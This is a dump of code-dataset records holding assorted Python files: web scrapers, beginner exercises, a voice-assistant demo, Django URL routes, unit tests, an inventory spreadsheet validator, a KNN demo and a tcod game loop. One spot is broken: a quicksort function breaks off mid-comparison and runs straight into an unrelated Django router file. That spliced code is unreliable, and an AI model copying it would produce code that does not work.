name='post_unlike'),\n    url(r'^post/(?P<post_id>\\d+)/comment/new/$', 'comment_form', name='comment_new'),\n    url(r'^post/(?P<post_id>\\d+)/comment/(?P<comment_id>\\d+)/new/$', 'comment_form', name='comment_edit'),\n    url(r'^post/(?P<post_id>\\d+)/comment/(?P<comment_id>\\d+)/delete/$', 'comment_delete', name='comment_delete'),\n)\n","sub_path":"timeline/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"281335891","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*- \n# @File Name: scrape.py\n# @Created: 2017-09-19 04:25:27 seo (simon.seo@nyu.edu) \n\nfrom urllib import request\nimport csv\nfrom bs4 import BeautifulSoup as 
bs\n\ndef main():\n\t# url = input(\"The URL of the data: \")\n\turl = \"http://i6.cims.nyu.edu/~ms9144/external/Species_All.htm\"\n\tpage = download(url)\n\n\t# csv_name = input('Name of the output csv file: ')\n\tdataname = 'endangered_species'\n\tparsed = parse(page, dataname + '.csv')\n\tstates = \"AL,AK,AZ,AR,CA,CO,CT,DE,FL,GA,HI,ID,IL,IN,IA,KS,KY,LA,ME,MD,MA,MI,MN,MS,MO,MT,NE,NV,NH,NJ,NM,NY,NC,ND,OH,OK,OR,PA,RI,SC,SD,TN,TX,UT,VT,VA,WA,WV,WI,WY\".split(',')\n\tfor i in range(len(states)):\n\t\tstates.insert(i*2, 'CurrentDistribution')\n\tprint(states)\n\tfilter_data(parsed, dataname + '_filtered.csv', 'Regions ofOccurrence', '5', *states)\n\ndef download(url):\n\t'''Downloads and returns a webpage'''\n\ttry:\n\t\tprint(\"Attempting download of the page.\")\n\t\tpage = request.urlopen(url).read()\n\texcept Exception as e:\n\t\tprint(\"Invalid page or failed connection.\")\n\t\traise e\n\telse:\n\t\tprint(\"Download successful. Parsing page.\")\n\treturn page\n\ndef parse(page, output_name):\n\t'''Parses the given webpage and saves table data in the output file'''\n\tsoup = bs(page, \"html.parser\")\n\tcsv_file = open(output_name, 'w')\n\twriter = csv.writer(csv_file, delimiter=',')\n\n\ttrs = soup.find_all('tr')\n\n\t# Save the header (only the ones that we require)\n\theader = []\n\treq = \"Scientific Name,Common Name,CurrentDistribution,Family,Species Group,Federal Listing Status,Regions ofOccurrence,Vertebrate/Invertebrate/Plant\"\n\treq = req.split(',')\n\ti = 0\n\treq_idx = [] # index of the header fields that we require\n\tfor field in trs[0]:\n\t\tfield = field.text.strip()\n\t\tif field in req:\n\t\t\theader.append(field)\n\t\t\treq_idx.append(i)\n\t\ti += 1\n\twriter.writerow(header)\n\n\t# Save the data rows\n\tfor tr in trs[1:]:\n\t\ttds = tr.find_all('td')\n\t\t# print(\": {}, \".join([h.text for h in header]).format(*[td.text.strip() for td in tds]))\n\t\trow = []\n\t\ti = 0\n\t\tfor td in tds:\n\t\t\tif i in req_idx:\n\t\t\t\tdata = td.text.strip()\n\t\t\t\tdata = 'N/A' if data in ['NA', '', 'No common name'] else data # unify expressions\n\t\t\t\trow.append(data)\n\t\t\ti += 1\n\t\twriter.writerow(row)\n\tcsv_file.close()\n\n\tprint(\"Page parsed and the data was saved in {}\".format(output_name))\n\treturn output_name\n
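\n# A sketch of the (field, keyword) pairs consumed by filter_data below\n# (illustrative file names): filter_data('in.csv', 'out.csv',\n#     'Regions ofOccurrence', '5', 'CurrentDistribution', 'AL', 'CurrentDistribution', 'AK')\n# appends one True/False column per pair, e.g. a header of \"AL in CurrentDistribution\".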
\ndef filter_data(input_name, output_name, *args):\n\t'''Add new fields that check whether each data row satisfies a condition'''\n\n\t# Create CSV reader and writer\n\ttry:\n\t\tcsv_in = open(input_name, 'r')\n\texcept Exception as e:\n\t\tprint('Check if unfiltered file exists.')\n\t\traise e\n\telse:\n\t\tprint('Checking for some filters')\n\treader = csv.reader(csv_in, delimiter=',')\n\tcsv_out = open(output_name, 'w')\n\twriter = csv.writer(csv_out, delimiter=',')\n\n\t# save the filter conditions and update header with the conditions\n\tfilters = []\n\theader = next(reader)\n\tfor i in range(0, len(args), 2):\n\t\theader.append('{1} in {0}'.format(args[i], args[i+1]))\n\t\tfilters.append((args[i], args[i+1]))\n\twriter.writerow(header)\n\n\t# for each species, check whether the conditions are satisfied\n\tfor row in reader:\n\t\tfor filter_field, keyword in filters:\n\t\t\tfor i in range(len(row)):\n\t\t\t\tif header[i] == filter_field:\n\t\t\t\t\trow.append(keyword in row[i])\n\t\twriter.writerow(row)\n\n\tcsv_in.close()\n\tcsv_out.close()\n\tprint('All filter conditions were checked and the data was saved in {}.'.format(output_name))\n\n\nmain()\n","sub_path":"HW2_scrub/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"578238566","text":"## FUNCTION\n#def namaFunction (): --> how to define a function\n#    program \n\n##example\ndef hello(): \n    print ('hello world!')\n#hello() ##calling the function\n##\ndef pangkat (x,y): ## parameter names are up to you\n    print (x**y)\n#pangkat (2,4)\n#pangkat (\n#    float(input ('Type the first number: ')), \n#    float (input ('Type the second number: '))\n#)#calling the function with input() values as its arguments\n##exercise: write a function with 1 parameter that determines whether the parameter value is odd or even\ndef gangen (x):\n    if (x%2==0):\n        print (f'{x} is an even number')\n    elif (x%2>0): \n        print (f'{x} is an odd number')\n#gangen (round(float(input ('Enter a number: '))))\n## a function that, when run, prompts in the terminal: enter number 1, enter an arithmetic operator, enter number 2\ndef calc():\n    angka1 = float(input('Enter number 1: '))\n    angka2 = float (input('Enter number 2: '))\n    operator = (input ('Enter an operator (+, -, *, /, **): '))\n    if operator=='+':\n        print (angka1 + angka2)\n    elif operator =='-':\n        print (angka1 - angka2)\n    elif operator == '*':\n        print (angka1 * angka2)\n    elif operator=='/':\n        print (angka1 / angka2)\n    elif operator=='**':\n        print (angka1 ** angka2)\n    else:\n        print (f'operator {operator} is not recognized')\n#calc ()\nstudents=['Andi', 'Budi', 'Caca']\ndef tes (x):\n    print(x[1])\n    print ('Caca' in x)\n#tes (students)\n## a function that changes every vowel into the letter 'o' (the target letter is asked for)\ndef vocal():\n    kata=input('enter a word/sentence: ')\n    huruf=input('enter the target vowel: ')\n    kata2= kata.replace('a', huruf).replace('i', huruf).replace('e', huruf).replace('u', huruf).replace('o', huruf).replace('A', huruf.upper()).replace('I', huruf.upper()).replace('E', huruf.upper()).replace('U', huruf.upper()).replace('O', huruf.upper())\n    print (kata2)\nvocal()\n### RETURN FUNCTION ###\n## Return function: it produces a value \ndef LuasPersegiReturn (sisi):\n    return sisi*sisi ## return the result so it can be stored in a variable\n#print (LuasPersegiReturn(4))\nluas=LuasPersegiReturn (5) ## e.g.: the value of LuasPersegiReturn is stored in a variable\ndef genap (x):\n    if x%2 == 0:\n        return True\n    else: \n        return False\n#print (genap (9)) \n","sub_path":"Day6b.py","file_name":"Day6b.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"69533460","text":"#!/usr/bin/env python3\n# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"A demo of the Google CloudSpeech recognizer.\"\"\"\n\nimport aiy.audio\nimport aiy.cloudspeech\nimport aiy.i18n\n\nimport mod.snowboydecoder as snowboydecoder\nimport mod.detect_intent_stream as detect_intent_stream\n\nimport os\nimport sys\nimport uuid\n
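\n# Usage (from the argv check below): python dialogflow_audio_demo.py your.model\n# -- the single positional argument is a Snowboy hotword model file.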
\naiy.i18n.set_language_code('ja-JP')\n\nif len(sys.argv) == 1:\n    print(\"Error: need to specify model name\")\n    print(\"Usage: python demo.py your.model\")\n    sys.exit(-1)\n\nmodel = sys.argv[1]\n\ndef callbacks():\n    #snowboydecoder.play_audio_file(snowboydecoder.DETECT_DING)\n    global interrupted\n    interrupted = True\n\ndef interrupt_callback():\n    global interrupted\n    return interrupted\n\ndef main():\n    detector = snowboydecoder.HotwordDetector(model, sensitivity=0.5)\n    aiy.audio.get_recorder().start()\n    dialogflow = detect_intent_stream.get_recognizer()\n\n    while True:\n        print('INFO:Speak Wake Word and speak')\n\n        global interrupted\n        interrupted = False\n\n        detector.start(detected_callback=callbacks,\n                       interrupt_check=interrupt_callback,\n                       sleep_time=0.03)\n\n        print('INFO:Listening...')\n        text = dialogflow.recognize(str(uuid.uuid4())).fulfillment_text\n\n        if not text:\n            print('INFO:Sorry, I did not hear you.')\n        else:\n            print('INFO:\"', text, '\"')\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"dialogflow_audio_demo.py","file_name":"dialogflow_audio_demo.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"635968293","text":"def quickSort(array,start,ends):\r\n    if start>=ends:\r\n        return\r\n    part=Partition(array,start,ends)\r\n    quickSort(array,start,part-1)\r\n    quickSort(array,part+1,ends)\r\n\r\ndef Partition(array,start,ends):\r\n    pivot=array[ends]\r\n    index=start\r\n    for i in range(start,ends):\r\n        if array[i]<pivot:\r\n            array[i],array[index]=array[index],array[i]\r\n            index+=1\r\n    array[index],array[ends]=array[ends],array[index]\r\n    return index\r\nv1_router.register(\n    'titles/(?P<title_id>[0-9]+)/reviews',\n    ReviewViewSet,\n    basename='reviews'\n)\nv1_router.register(\n    'titles/(?P<title_id>[0-9]+)/reviews/(?P<review_id>[0-9]+)/comments',\n    CommentViewSet,\n    basename='comments'\n)\n\nurlpatterns = [\n    path('v1/', include(v1_router.urls)),\n    path('v1/auth/', include('yamdb_auth.urls')),\n    path('v1/users/', include('users.urls')),\n]\n","sub_path":"yamdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555225290","text":"#!/usr/bin/env python\n\nimport unittest\n\nimport chart\n\n\nclass TestProcessor(unittest.TestCase):\n\n    def test_multiple_hosts_multiple_runs(self):\n        expected = \"x:'x', \" \\\n                   \"columns:[\" \\\n                   \"['x', 500, 1000]\" \\\n                   \",['load-throughput', 1748.5974, 1716.7574]\" \\\n                   \",['wla-throughput', 2091.4185, 2124.3818]\" \\\n                   \"]\"\n\n        source_files = \"test/data/big_run\"\n        c = chart.throughput(source_files)\n        self.assertEqual(expected, c)\n\n    def test_should_handle_missing_files_without_skewing_data(self):\n        expected = \"x:'x', \" \\\n                   \"columns:[\" \\\n                   \"['x', 500, 1000]\" \\\n                   \",['load-throughput', 1798.9889, 0]\" \\\n                   \",['wla-throughput', 2049.0405, 2233.0913]\" \\\n                   \"]\"\n        source_files = \"test/data/incomplete_run_different_hosts\"\n        self.assertEqual(expected, chart.throughput(source_files))\n\n\ndef main():\n    unittest.main()\n\n\nif __name__ == '__main__':\n    main()","sub_path":"fabfile/charts/test/chart_acceptance_test.py","file_name":"chart_acceptance_test.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30016916","text":"from cuz.books.models import ConversionHistory\nfrom cuz.books.tasks.converter import Converter, VERSIONS, FINAL, TASK_ID_FIELDS\nfrom cuz.core import tasks\nfrom cuz.core.tasks import PROCESSING, STOPPED\n
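\n# NOTE: convert() below keeps at most one active conversion per (book, version):\n# any task id already recorded for that version is revoked via stop() before a\n# fresh Converter run is queued and its new task id saved on the book.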
\n\ndef convert(user, book, version, email=True):\n    # prepare\n    if not book.layout:\n        raise Exception(\"book is missing a layout\")\n    if version not in VERSIONS:\n        raise Exception(\"invalid version %s\" % version)\n    task_id = getattr(book, TASK_ID_FIELDS[version])\n    stop(task_id)\n\n    # convert\n    converter = Converter()\n    result = converter.delay(user.id, book.id, version, book.layout.lower(), email)\n    setattr(book, TASK_ID_FIELDS[version], result.task_id)\n    book.save()\n\n    return result.task_id\n\n\ndef stop(task_id):\n    if task_id:\n        audit = ConversionHistory.objects.filter(task_id=task_id).first()\n        if audit and audit.status == PROCESSING:\n            # stop conversion\n            tasks.revoke(task_id)\n            audit.status = STOPPED\n            audit.save()\n\n            # update book\n            if audit.version == FINAL:\n                audit.book.converted_final_snapshot = ''\n            setattr(audit.book, TASK_ID_FIELDS[audit.version], None)\n            audit.book.save()\n","sub_path":"Latex/sources/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118768745","text":"T = int(input())\nMOD = 10 ** 9 + 7\n\ndef check(n, a, b):\n    if a + b > n:\n        return 0\n\n    blue = (n - a + 1) ** 2 % MOD\n    red = (n - b + 1) ** 2 % MOD\n    ans = blue * red % MOD\n    \n    X4 = (n - a - b + 2) * (n - a - b + 1) // 2\n    X3 = 2 * X4\n    X2 = (n - a + 1) * (n - b + 1) - X3\n    X1 = X2 ** 2 % MOD\n    ans -= X1\n    ans %= MOD\n    \n    return ans\n\nfor _ in range(T):\n    N, A, B = map(int, input().split())\n    print(check(N, A, B))\n","sub_path":"atcoder/2020/Other/1010_HHKB2020/D_cheat.py","file_name":"D_cheat.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"614561928","text":"#!/usr/bin/env python3\n'''\nv1.1:\n - that version creates IB list and output file (tab \"Detailed Inventory\") containing duplicate SNs, no SN items excluded\n - creates tab \"EoS Report\" and lists SNs with EoS Flag set to \"Y\"\n - creates \"SN to PN double mapping\" tab that lists lines that have different Material Ids (PNs) associated with same SN\n'''\n \nimport openpyxl\nimport sys\n \ndef main():\n    \n    try:\n        in_file = sys.argv[1]\n        out_file = sys.argv[2]\n    except IndexError: \n        print('\\nRun the script with input and output files:\\n\\t\\t\\tIB_validation.py <input>.xlsx <output>.xlsx\\n\\n')\n    else: \n        workbook = in_file\n        sheetName = 'Detailed Inventory'\n        sheet = openpyxl.load_workbook(workbook)[sheetName]\n        wb = sheet['A:AU']\n        \n        # exceptions_no_SN list lists PNs that have no SN such as power modules, fans, sw licenses etc\n        exceptions_no_SN = ['ACX4000BASE-DC', 'CHAS-ACX4000-S', 'JUNOS-WW', 'JUNOS-WW-BB', 'JUNOS-64', 'JUNOS-LTD-64',\n                            'JUNOS-WW-64', 'FANTRAY-MX80-BB', 'FFILTER-MX960-HC-BB', 'CBL-JX-PWR-EU', 'FFILTER-MX960-BB',\n                            'FFANTRAY-MX480-HC-BB', 'CBL-M-PWR-RA-EU', 'CBL-PWR-10AC-STR-EU', 'S-MX80-Q', 'S-MPC-3D-VQ', 'MX2K-CBL-BTM-BB',\n                            'JS-IPv6', 'S-MPC-3D-VQ-ADV-R', 'S-MPC-3D-PQ-ADV-R', 'S-SSM-FP', 'S-MX80-ADV-R', 'CBL-PWR-C15M-HITEMP-EU', 'CBL-M-PWR-RA-US',\n                            'S-ACCT-JFLOW-IN', 'S-MPC3E-3D-ADV-R', 'S-SA-64K', 'S-SA-FP', 'S-MPC-3D-16XGE-ADV-R', 'S-ACCT-JFLOW-IN-5G',\n                            'WLA-ANTPROT-OUT', 'PWR-T-BUS-BAR-S', 'MX2K-DCCBLMGR-BB', 'MX2K-EMI-BTM-BB',\n                            'FAN-REAR-TX-T640-BB', 'FANTRAY-M10i-S', 'S-MPC4E-3D-ADV-R', 'S-MPC4E-3D-ADV-IR', 'MCG-PPB-S', 'S-MX80-SSM-FP',\n                            'S-NAT', 'S-SA-4K', 'S-SA-16K', 'S-MX104-UPG-4X10GE', 'S-SFW', 'S-MX104-ADV-R2', 'S-MX104-Q', 'FAN-REAR-TXP-LCC-BB']\n        \n        # exceptions_sku dictionary lists PNs that are just alternative names for their respective base PNs, such as 
Premium bundles that include some line cards and modules that base PN does not\n exceptions_sku = {\n 'NS-ISG-2000-SK1': 'NS-ISG-2000',\n 'MX240BASE-DC': 'MX240-PREMIUM2-DC',\n 'MX240BASE3-DC': 'MX240-PREMIUM3-DC',\n 'MX240BASE-AC-HIGH': 'MX240-PREMIUM2-AC-HIGH',\n 'MX480BASE-DC': 'MX480-PREMIUM2-DC',\n 'MX480BASE3-DC': 'MX480-PREMIUM3-DC',\n 'MX480BASE-AC': 'MX480-PREMIUM2-AC',\n 'MX480BASE3-AC': 'MX480-PREMIUM3-AC',\n 'MX960BASE3-DC': 'MX960-PREMIUM3-DC',\n 'MX960BASE3-AC': 'MX960-PREMIUM3-AC'\n }\n \n exceptions_material_status = ['Scrapped', 'Inactive', 'None']\n \n headers = {'Serial Number': 0,\n 'Material Id': 0,\n 'Material Status': 0,\n 'EOS Flag': 0}\n \n def get_header_indx(ib_header_list, headers):\n for k in headers.keys():\n i = 0\n for cell in ib_header_list:\n if cell == k:\n headers[k] = i\n break\n else: i += 1\n \n return headers\n \n # Finds line index in IB by SN and PN\n def find_line_in_ib(ib, headers, sn, pn):\n i = 0\n sn_index = get_header_indx(ib[0],headers)['Serial Number']\n pn_index = get_header_indx(ib[0],headers)['Material Id']\n while i < len(ib):\n if ib[i][sn_index] == sn and ib[i][pn_index] == pn:\n break\n elif i == (len(ib) - 1):\n i = 0\n break\n else: i += 1\n return i\n \n def IB_init(sheet):\n ib = []\n \n flag = True\n for row in sheet.rows:\n sn_line = []\n if flag:\n sn_line.append('DUP_FLAG')\n flag = False\n else:\n sn_line.append('')\n i = 0\n while i < len(row):\n if row[i].value == None or row[i].value == '': sn_line.append('None')\n else: sn_line.append(row[i].value)\n i += 1\n \n ib.append(sn_line)\n \n return ib\n \n # Returns an IB list with indication of duplicated SNs\n def mark_duplicates(ib, headers, exceptions_no_SN):\n sn_dict = {} #sn_dict contains unique combinations of SNs and PNs\n duplicates = {}\n sn_pn_confusion = []\n material_status_issues = []\n \n sn_index = get_header_indx(ib[0],headers)['Serial Number']\n pn_index = get_header_indx(ib[0],headers)['Material Id']\n item_status_index = get_header_indx(ib[0],headers)['Material Status']\n \n i = 0\n while i < len(ib):\n\n sn = ib[i][sn_index]\n pn = ib[i][pn_index]\n item_status = ib[i][item_status_index]\n\n if item_status not in exceptions_material_status:\n if pn not in exceptions_no_SN:\n if (sn, pn) not in sn_dict.items():\n if sn not in sn_dict.keys(): sn_dict[sn] = pn\n else:\n n = find_line_in_ib(ib, headers, sn, sn_dict[sn])\n sn_pn_confusion.append(ib[n])\n sn_pn_confusion.append(ib[i])\n elif (sn, pn) not in duplicates.items():\n ib[i][0] = 'DUPLICATE'\n n = find_line_in_ib(ib, headers, sn, pn)\n ib[n][0] = 'duplicated'\n duplicates[sn] = pn\n else:\n ib[i][0] = 'DUPLICATE'\n else: material_status_issues.append(ib[i])\n \n i += 1\n \n unique_sn_pn_pairs = len(sn_dict) \n print('\\nTotal number of unique SN-PN pairs is: {}\\n'.format(unique_sn_pn_pairs))\n \n return ib, sn_pn_confusion, material_status_issues\n\n def sn_pn_confusion_cleanup_all(sn_pn_confusion, headers, exceptions_sku):\n l = list(sn_pn_confusion)\n for line in sn_pn_confusion:\n sn = line[headers['Serial Number']]\n pn = line[headers['Material Id']]\n if pn in exceptions_sku.keys():\n cur = find_line_in_ib(l, headers, sn, pn)\n nxt = find_line_in_ib(l, headers, sn, exceptions_sku[pn])\n if nxt:\n if nxt > cur:\n print('nxt > cur which is expected')\n del(l[nxt])\n del(l[cur])\n else:\n #print('cur > nxt')\n del(l[cur])\n del(l[nxt])\n #else:\n # print(sn)\n # print(pn)\n \n return l\n \n \n #===============================================MAIN================================================\n \n 
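# Flow, as implemented above: IB_init() builds the raw list, mark_duplicates()\n    # tags the first occurrence of a repeated SN-PN pair 'duplicated' and every\n    # later one 'DUPLICATE', and the writer section below emits one tab per issue.\n    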
IB = IB_init(sheet)\n    del(sheet)\n    headers = get_header_indx(IB[0],headers)\n    IB, SN_PN_confusion, Material_Status_Issues = mark_duplicates(IB, headers, exceptions_no_SN)\n    \n    # ==============================================OUTPUT============================================== \n    # import Workbook\n    from openpyxl import Workbook\n    # create Workbook object\n    wb = Workbook()\n    # set file path\n    filepath = out_file\n    # grab the active worksheet\n    sheet = wb.active\n    \n    # Create, initialize and populate data into the new sheet \"Duplicated SNs\"\n    sheet.title = 'Duplicated SNs'\n    sheet.append(IB[0])\n    sheet.auto_filter.ref = \"A:BE\"\n    sheet.freeze_panes = 'A2'\n    IB_dup_list = []\n    for line in IB:\n        if line[0] == 'duplicated' or line[0] == 'DUPLICATE':\n            IB_dup_list.append(line)\n    \n    for line in IB_dup_list:\n        sheet.append(line)\n    \n    # Create, initialize and populate data into the new sheet \"SN to PN double mapping\"\n    wb.create_sheet(title = 'SN to PN double mapping')\n    sheet = wb['SN to PN double mapping']\n    sheet.append(IB[0])\n    sheet.auto_filter.ref = \"A:BE\"\n    sheet.freeze_panes = 'A2'\n    SN_PN_confusion = sn_pn_confusion_cleanup_all(SN_PN_confusion, headers, exceptions_sku)\n    for line in SN_PN_confusion:\n        sheet.append(line)\n    \n    # Create, initialize and populate data into the new sheet \"Material Status Issues\"\n    wb.create_sheet(title = 'Material Status Issues')\n    sheet = wb['Material Status Issues']\n    sheet.append(IB[0])\n    sheet.auto_filter.ref = \"A:BE\"\n    sheet.freeze_panes = 'A2'\n    for line in Material_Status_Issues:\n        sheet.append(line)\n\n    # Create, initialize and populate data into the new sheet \"EoS Report\"\n    wb.create_sheet(title = 'EoS Report')\n    sheet = wb['EoS Report']\n    sheet.append(IB[0])\n    sheet.auto_filter.ref = \"A:BE\"\n    sheet.freeze_panes = 'A2'\n    eos_index = get_header_indx(IB[0],headers)['EOS Flag']\n    for line in IB:\n        if line[eos_index] == 'Y':\n            sheet.append(line)\n    \n    # save file\n    wb.save(filepath)\n\nif __name__ == '__main__': main()\n\n#=======================END OF SCRIPT====================================\n","sub_path":"IB_validation_v1.2.py","file_name":"IB_validation_v1.2.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643857209","text":"from cnslibs.common.heketi_ops import (heketi_volume_delete,\n                                       heketi_volume_create,\n                                       heketi_volume_expand,\n                                       heketi_volume_info)\nfrom cnslibs.common.baseclass import BaseClass\n\n\nclass TestHeketiVolumeOperations(BaseClass):\n    \"\"\"\n    Class to test heketi volume operations - create, expand\n    \"\"\"\n\n    @classmethod\n    def setUpClass(cls):\n        super(TestHeketiVolumeOperations, cls).setUpClass()\n        cls.volume_size = 1\n\n    def test_heketi_with_default_options(self):\n        \"\"\"\n        Test to create volume with default options.\n        \"\"\"\n\n        vol_info = heketi_volume_create(self.heketi_client_node,\n                                        
self.heketi_server_url,\n                                        self.volume_size, json=True)\n        self.assertTrue(vol_info, (\"Failed to create heketi volume of size %s\"\n                                   % self.volume_size))\n        self.addCleanup(\n            heketi_volume_delete,\n            self.heketi_client_node, self.heketi_server_url, vol_info['id'])\n\n        self.assertEqual(vol_info['size'], self.volume_size,\n                         (\"Failed to create volume with default options.\"\n                          \"Expected Size: %s, Actual Size: %s\"\n                          % (self.volume_size, vol_info['size'])))\n\n    def test_heketi_with_expand_volume(self):\n        \"\"\"\n        Test volume expand and size if updated correctly in heketi-cli info\n        \"\"\"\n\n        vol_info = heketi_volume_create(self.heketi_client_node,\n                                        self.heketi_server_url,\n                                        self.volume_size, json=True)\n        self.assertTrue(vol_info, (\"Failed to create heketi volume of size %s\"\n                                   % self.volume_size))\n        self.addCleanup(\n            heketi_volume_delete,\n            self.heketi_client_node, self.heketi_server_url, vol_info['id'])\n        self.assertEqual(vol_info['size'], self.volume_size,\n                         (\"Failed to create volume.\"\n                          \"Expected Size: %s, Actual Size: %s\"\n                          % (self.volume_size, vol_info['size'])))\n        volume_id = vol_info[\"id\"]\n        expand_size = 2\n        ret = heketi_volume_expand(self.heketi_client_node,\n                                   self.heketi_server_url, volume_id,\n                                   expand_size)\n        self.assertTrue(ret, (\"Failed to expand heketi volume of id %s\"\n                              % volume_id))\n        volume_info = heketi_volume_info(self.heketi_client_node,\n                                         self.heketi_server_url,\n                                         volume_id, json=True)\n        expected_size = self.volume_size + expand_size\n        self.assertEqual(volume_info['size'], expected_size,\n                         (\"Volume Expansion failed Expected Size: %s, Actual \"\n                          \"Size: %s\" % (str(expected_size),\n                                        str(volume_info['size']))))\n","sub_path":"tests/functional/heketi/test_heketi_volume_operations.py","file_name":"test_heketi_volume_operations.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"37804054","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 3 16:59:17 2018\n\n@author: suliang\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.neighbors import KNeighborsClassifier, RadiusNeighborsClassifier\n\n# Load the data\ncenters = np.array([[-2,2],[2,2],[0,4]])\nX,y = make_blobs(n_samples=120, centers=centers,random_state=0, cluster_std=0.60)\n\n# Configure the KNN classifier\nk = 5\nclf = KNeighborsClassifier(n_neighbors=k)\nclf.fit(X,y)\nprint('classifier score is: {}'.format(clf.score(X,y)))\n\n# Get the nearest neighbours: what comes back are the indices of the neighbouring points\nX_sample = [[0,2]] # the input must be 2-D; a nested list or an array both work\ny_sample = clf.predict(X_sample) # predict\nneighbors = clf.kneighbors(X_sample, return_distance=False) # get the k nearest neighbours\n
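\n# Note: kneighbors(..., return_distance=False) returns the indices of the k\n# nearest training points, one row per query -- here a (1, 5) array for the\n# single sample [[0, 2]].\n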
\n# Visualization\nplt.figure(figsize=(8,5),dpi=80)\nplt.scatter(X[:,0],X[:,1],c='y',s=100,cmap='cool') # plot the samples\nplt.scatter(centers[:,0],centers[:,1],c='r',s=100,marker='^') # plot the cluster centres\nplt.scatter(X_sample[0][0],X_sample[0][1],c='r',s=100,marker='x') # plot the new sample\n# draw lines from the new sample X_sample to its k nearest neighbours\nfor i in neighbors[0]: # draw a line from each neighbour to the sample\n    plt.plot([X[i][0],X_sample[0][0]], [X[i][1], X_sample[0][1]], 'k--', linewidth = 0.6)\n\n# distance-weighted KNN\nclf_dis = KNeighborsClassifier(n_neighbors=k, weights = 'distance')\n# neighbours within a radius instead of the k nearest\nclf_rad = RadiusNeighborsClassifier(radius = 200.0) \n\n","sub_path":"KNN/KNN_sklearn_clf.py","file_name":"KNN_sklearn_clf.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"569262040","text":"import libtcodpy as tcod\n\nclass Game:\n    current_map = None\n\n    fov_recompute = True\n\n    is_running = False\n\n    player = None\n\n    screen_width = 0\n    screen_height = 0\n\n    turn = 0\n\n    @classmethod\n    def handle_keys(cls):\n        if Game.player is None:\n            return 0\n\n        turns_elapsed = 0\n\n        key = tcod.console_wait_for_keypress(True)\n\n        if key.vk == tcod.KEY_F11:\n            tcod.console_set_fullscreen(not tcod.console_is_fullscreen())\n\n        if key.vk == tcod.KEY_ESCAPE:\n            Game.is_running = False\n            return 0\n\n        move_x = 0\n        move_y = 0\n        if (\n            key.vk == tcod.KEY_KP1 or\n            key.vk == tcod.KEY_KP2 or\n            key.vk == tcod.KEY_KP3\n        ):\n            move_y += 1\n        elif (\n            key.vk == tcod.KEY_KP7 or\n            key.vk == tcod.KEY_KP8 or\n            key.vk == tcod.KEY_KP9\n        ):\n            move_y -= 1\n\n        if (\n            key.vk == tcod.KEY_KP3 or\n            key.vk == tcod.KEY_KP6 or\n            key.vk == tcod.KEY_KP9\n        ):\n            move_x += 1\n        elif (\n            key.vk == tcod.KEY_KP1 or\n            key.vk == tcod.KEY_KP4 or\n            key.vk == tcod.KEY_KP7\n        ):\n            move_x -= 1\n\n        if move_x != 0 or move_y != 0:\n            Game.fov_recompute = True\n            Game.player.move(move_x, move_y)\n            turns_elapsed = 1\n\n        return turns_elapsed\n\n    @classmethod\n    def init(cls, screen_width, screen_height, window_title, full_screen):\n        FONT_PATH = 'font/consolas12x12_gs_tc.png'\n        FONT_FLAGS = tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD\n        tcod.console_set_custom_font(FONT_PATH, FONT_FLAGS)\n\n        print(\"Initializing game window\")\n\n        tcod.console_init_root(screen_width, screen_height, window_title,\n                               full_screen)\n        Game.con = tcod.console_new(screen_width, screen_height)\n\n        Game.screen_width = screen_width\n        Game.screen_height = screen_height\n\n    @classmethod\n    def update(cls):\n        if Game.current_map is None:\n            return\n\n        Game.current_map.draw(Game.con, Game.player)\n        # for o in Game.objects:\n        #     o.draw(Game.con)\n\n        width = Game.screen_width\n        height = Game.screen_height\n        tcod.console_blit(Game.con, 0, 0, width, height, 0, 0, 0)\n\n        tcod.console_flush()\n\n        Game.current_map.clear(Game.con)\n        # for o in Game.objects:\n        #     o.clear(Game.con)\n\n        turns_elapsed = Game.handle_keys()\n        for i in range(turns_elapsed):\n            Game.current_map.update()\n            Game.turn += 1\n            print(f\"Turn: {Game.turn}\")\n\n    @classmethod\n    def run(cls):\n        Game.is_running = True\n\n        print(\"Entering game loop\")\n        while not tcod.console_is_window_closed() and Game.is_running:\n            